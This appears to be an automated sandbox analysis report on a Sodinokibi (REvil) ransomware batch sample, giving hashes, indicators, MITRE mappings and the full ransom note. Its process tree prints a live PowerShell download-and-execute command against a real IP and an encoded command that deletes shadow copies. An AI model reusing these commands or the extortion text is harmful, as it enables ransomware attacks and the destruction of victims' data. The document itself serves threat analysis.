sodinokibi | 60f07d4e5bfcf8fc08bf003d47aa6915f9c2dd834aa0b75985106206216a460c

General

Target

7cd0bfdb268bef7da1671e95b6f5aa33.bat
Size

216B
MD5

a5ff6055fd55ba2b81de2d9b7100ec8a
SHA1

b8df51a999fc532ba49b2f5769ed7b850ca94f75
SHA256

60f07d4e5bfcf8fc08bf003d47aa6915f9c2dd834aa0b75985106206216a460c
SHA512

9596d6d408462e5eea678ffa474b6fca135fe71ad024ce6e080ef350ec370c7820585e805e58f44e11cd1fb362badc39878794e505343892c6eb4cbbccbca20d

Score

10^/10

ransomware sodinokibi persistence

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/7cd0bfdb268bef7da1671e95b6f5aa33

Extracted

Path

C:\lzv1c-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension lzv1c. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/525AF2391A87112C 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/525AF2391A87112C Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: lQ+Uy3x3uWe/is8NwcMCXJLXLlHnBMJiztnOmCj8eOL/4Ey/TCAWvGPNitqhH6iL sxxSxNyu5Z6QXzmQF4mvvgGoiqPyAKGl2l5mwcb3bC2mXuw4pnqW4ur4hh1aUSXq YjIp1b1KXxCYj2JWV5mEv86DGvHDtQVHswrGI7qH8TUGsfMmrJu2kQXcyKYHqMse NRzViuSDcJRPT8YvLPjYfgCFD1mKLO6rGG2Yvk3sTLw1fR9iuMyCLY2z7MGopdpZ RncDcLgJgYhtyfx/UL3CRglqrg3paNqbFZdskQKcBFBXL10GtHvIoJIjPv7w0qwa bThyzX1deA+/477X3JyIqBwAo2mwFXM15kk2W5B7ZcUt9hD6y+bGmMvOJc5tY9xQ Z862kq21WbuysIUQk3o3I0BmNc6mP479QTxuPfVG9UV/BGIbqDNfc8TdCnycuBTG hmPCw7UFmWtCZt2oZjLnLEz714mMxplHZNAoJeY68C1FUzwDZLV9HRL+5HklF8vu SJT8p3OXTBEnOPoNFPEId9hZIe3gPyfgK2dii5v6u1aPKX7KSF8xPlXITSBDb6Wu flHTGOtjFFgGaviFzVHY32RG3DR+JWlo1iWCqN9t3KQHQArTSV/F/wOYEnqZa6xO ifG9br1A4q9E0JwDuJbdNYJmLP43YPpRVa73RgjD/QjqGq0703f1vfyYKKR9kBXo dc9d0B7E3LpMJGLERjqhiO2Dcc+9/pt69UxJHbj50Y69DBaZ0Fy2JNP995Y0kM04 UtRQKOBrqYOmk0FW4N4NzLrMIbHSz1ZX88TslVWYeaOaP6A3JLkGZ4FnfMmLewbx gzvQoSgp0gWxVIvhA53KwfLjqYL12QJSl3LE0Sbt/wvkPTgF7lPMpVYFsVTB1V4G F2n83ps0Ij8SWRzP+/Z3PLLjHUFlTze5wQuMLiSQ8Q6o6xN/oZgp+pB73iSHG193 si30cXXmSf2sRy6TSVbXXhdt48X3BDLUt2PTUrvbjRTgky0hOuqNxVJxjqwmksqG vQ92tu7sQvPh0JIfZeSp+XOMfRSMKM4vxH28dKk/YgOEhJdqMvDXH0Rzhi6OU62a 7MsMGO6mRZvA489n1mxGQQusaS0P0naGD6TCvtuTgc00Y8kirnz+powHlNFLPrB6 HQlcrHps5r1dKjidQ55nGjFYxlfufHAINUA1AWhW74mG1QG5iIqy49GbHNkmj8Tg nzhc4A7e8QVsfB18CsatjiqJ1yTJNqhCPALjtxAxRMeLlUlhVr0IyACg8nE+p0+3 Zt21py4V4APHeg+aZTmHpDPhtworVbOAvgYGqerM ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/525AF2391A87112C

http://decryptor.cc/525AF2391A87112C

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi
Blacklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

3 528 powershell.exe

flow	pid	process
3	528	powershell.exe

Modifies extensions of user files 9 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

powershell.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\StartComplete.tif => \??\c:\users\admin\pictures\StartComplete.tif.lzv1c	powershell.exe
File opened for modification	\??\c:\users\admin\pictures\TestReset.tiff	powershell.exe
File renamed	C:\Users\Admin\Pictures\PopJoin.tif => \??\c:\users\admin\pictures\PopJoin.tif.lzv1c	powershell.exe
File renamed	C:\Users\Admin\Pictures\RepairConvert.raw => \??\c:\users\admin\pictures\RepairConvert.raw.lzv1c	powershell.exe
File renamed	C:\Users\Admin\Pictures\TestReset.tiff => \??\c:\users\admin\pictures\TestReset.tiff.lzv1c	powershell.exe
File renamed	C:\Users\Admin\Pictures\UnblockRedo.tif => \??\c:\users\admin\pictures\UnblockRedo.tif.lzv1c	powershell.exe
File renamed	C:\Users\Admin\Pictures\MoveMeasure.png => \??\c:\users\admin\pictures\MoveMeasure.png.lzv1c	powershell.exe
File renamed	C:\Users\Admin\Pictures\ResumeUninstall.png => \??\c:\users\admin\pictures\ResumeUninstall.png.lzv1c	powershell.exe
File renamed	C:\Users\Admin\Pictures\SearchShow.png => \??\c:\users\admin\pictures\SearchShow.png.lzv1c	powershell.exe

Enumerates connected drives 3 TTPs

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\o79gyj.bmp"	powershell.exe

Drops file in Program Files directory 37 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	\??\c:\program files\RepairExport.pptx	powershell.exe
File opened for modification	\??\c:\program files\SubmitInstall.au3	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\lzv1c-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\CompareRedo.wmf	powershell.exe
File opened for modification	\??\c:\program files\ConvertFromSearch.vb	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\lzv1c-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\ReceiveOpen.mpg	powershell.exe
File opened for modification	\??\c:\program files\BackupClose.tiff	powershell.exe
File opened for modification	\??\c:\program files\CloseUnprotect.docx	powershell.exe
File opened for modification	\??\c:\program files\RestoreNew.mhtml	powershell.exe
File opened for modification	\??\c:\program files\SavePop.ogg	powershell.exe
File opened for modification	\??\c:\program files\UnprotectLock.vst	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\desktop\lzv1c-readme.txt	powershell.exe
File created	\??\c:\program files\lzv1c-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\ImportRemove.m3u	powershell.exe
File opened for modification	\??\c:\program files\PopBackup.m4a	powershell.exe
File opened for modification	\??\c:\program files\ResizeReset.wma	powershell.exe
File opened for modification	\??\c:\program files\ResumeTest.AAC	powershell.exe
File opened for modification	\??\c:\program files\SendRequest.png	powershell.exe
File opened for modification	\??\c:\program files\ConvertFromPush.TTS	powershell.exe
File opened for modification	\??\c:\program files\EditHide.TS	powershell.exe
File opened for modification	\??\c:\program files\LockSearch.ADT	powershell.exe
File opened for modification	\??\c:\program files\RepairEdit.temp	powershell.exe
File opened for modification	\??\c:\program files\SaveInvoke.dib	powershell.exe
File opened for modification	\??\c:\program files\UndoCompress.pub	powershell.exe
File created	\??\c:\program files (x86)\lzv1c-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\CompleteSplit.tif	powershell.exe
File opened for modification	\??\c:\program files\PopStop.vb	powershell.exe
File opened for modification	\??\c:\program files\FormatInitialize.mht	powershell.exe
File opened for modification	\??\c:\program files\HideExpand.css	powershell.exe
File opened for modification	\??\c:\program files\EditResume.au	powershell.exe
File opened for modification	\??\c:\program files\EnableDismount.css	powershell.exe
File opened for modification	\??\c:\program files\RenameSkip.wmv	powershell.exe
File opened for modification	\??\c:\program files\StopFormat.scf	powershell.exe
File opened for modification	\??\c:\program files\UninstallApprove.vssm	powershell.exe
File opened for modification	\??\c:\program files\ConvertFromExit.pps	powershell.exe
File opened for modification	\??\c:\program files\DisableDebug.rtf	powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

powershell.exe

pid process

528 powershell.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid process

528 powershell.exe
528 powershell.exe
528 powershell.exe
1272 powershell.exe
1272 powershell.exe

pid	process
528	powershell.exe

pid	process
528	powershell.exe
528	powershell.exe
528	powershell.exe
1272	powershell.exe
1272	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	528	powershell.exe
Token: SeDebugPrivilege	528	powershell.exe
Token: SeDebugPrivilege	1272	powershell.exe
Token: SeBackupPrivilege	628	vssvc.exe
Token: SeRestorePrivilege	628	vssvc.exe
Token: SeAuditPrivilege	628	vssvc.exe
Token: SeTakeOwnershipPrivilege	528	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

cmd.exepowershell.exe

description	pid	process	target process
PID 1436 wrote to memory of 528	1436	cmd.exe	powershell.exe
PID 1436 wrote to memory of 528	1436	cmd.exe	powershell.exe
PID 1436 wrote to memory of 528	1436	cmd.exe	powershell.exe
PID 1436 wrote to memory of 528	1436	cmd.exe	powershell.exe
PID 528 wrote to memory of 1272	528	powershell.exe	powershell.exe
PID 528 wrote to memory of 1272	528	powershell.exe	powershell.exe
PID 528 wrote to memory of 1272	528	powershell.exe	powershell.exe
PID 528 wrote to memory of 1272	528	powershell.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\7cd0bfdb268bef7da1671e95b6f5aa33.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1436

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/7cd0bfdb268bef7da1671e95b6f5aa33');Invoke-CROBJXDEH;Start-Sleep -s 10000"
2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:528

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1272

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:628

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_478c05f3-b801-4912-91bd-47646e127596

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4fd4a7fe-82f5-41e4-888c-1b7eac83ece7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a2ebb337-3027-47ef-8098-8d2e9f7615cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ca37ad88-4ce8-48e7-a2ed-ec10658dba29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e10aa6dc-f3ff-45e4-9eec-4fef42847693

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e1dd9aab-0fd1-4532-ba7f-00569c2741ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Download Submit
memory/528-5-0x0000000004760000-0x0000000004761000-memory.dmp

Filesize
4KB

Download
memory/528-21-0x00000000061F0000-0x00000000061F1000-memory.dmp

Filesize
4KB

Download
memory/528-22-0x00000000062C0000-0x00000000062C1000-memory.dmp

Filesize
4KB

Download
memory/528-14-0x0000000006220000-0x0000000006221000-memory.dmp

Filesize
4KB

Download
memory/528-13-0x0000000006120000-0x0000000006121000-memory.dmp

Filesize
4KB

Download
memory/528-8-0x0000000006090000-0x0000000006091000-memory.dmp

Filesize
4KB

Download
memory/528-0-0x0000000000000000-mapping.dmp

Download
memory/528-4-0x0000000000F40000-0x0000000000F41000-memory.dmp

Filesize
4KB

Download
memory/528-3-0x00000000048B0000-0x00000000048B1000-memory.dmp

Filesize
4KB

Download
memory/528-2-0x0000000000650000-0x0000000000651000-memory.dmp

Filesize
4KB

Download
memory/528-1-0x0000000074820000-0x0000000074F0E000-memory.dmp

Filesize
6.9MB

Download
memory/1272-23-0x0000000000000000-mapping.dmp

Download
memory/1272-25-0x0000000074820000-0x0000000074F0E000-memory.dmp

Filesize
6.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads